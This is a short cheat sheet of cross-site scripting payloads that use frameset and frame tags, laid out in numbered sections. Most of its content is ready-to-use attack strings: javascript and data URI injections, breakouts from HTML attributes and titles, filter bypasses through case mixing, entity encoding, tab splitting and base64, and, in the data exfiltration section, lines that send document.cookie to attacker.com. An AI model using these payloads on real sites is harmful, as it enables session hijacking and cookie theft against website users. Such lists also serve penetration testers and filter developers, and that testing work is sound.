🔥 ULTIMATE FRAMESET XSS (CLEAN)

⸻

1. CORE (LIMITED ⚠️)

<frameset><frame src=javascript:alert(1)></frameset>
<frameset><frame src="javascript:alert(1)"></frameset>


⸻

2. DATA URI (MUHIM)

<frameset><frame src="data:text/html,<script>alert(1)</script>"></frameset>
<frameset><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></frameset>


⸻

3. SVG CHAIN

<frameset><frame src="data:text/html,<svg onload=alert(1)>"></frameset>


⸻

4. CONTEXT BREAKOUT

"><frameset><frame src=javascript:alert(1)>
'><frameset><frame src="data:text/html,<script>alert(1)</script>">


⸻

5. DATA EXFILTRATION

<frameset><frame src="javascript:fetch('//attacker.com?c='+document.cookie)"></frameset>
<frameset><frame src="javascript:location='//attacker.com?c='+document.cookie"></frameset>


⸻

6. OBFUSCATION

<frameset><frame src="jAvAsCrIpT:alert(1)"></frameset>
<frameset><frame src="javascript&colon;alert(1)"></frameset>


⸻

7. WHITESPACE BYPASS

<frameset><frame src="jav	ascript:alert(1)"></frameset>


⸻

8. POLYGLOT

</title><frameset><frame src=javascript:alert(1)>


⸻

9. ENCODED

%3Cframeset%3E%3Cframe%20src%3Djavascript%3Aalert(1)%3E


⸻

10. ADVANCED JS EXECUTION

<frameset><frame src="javascript:eval('alert(1)')"></frameset>
<frameset><frame src="javascript:setTimeout(alert,0,1)"></frameset>


⸻

11. HYBRID (CHAIN)

<frameset><frame src="data:text/html,<img src=x onerror=alert(1)>"></frameset>
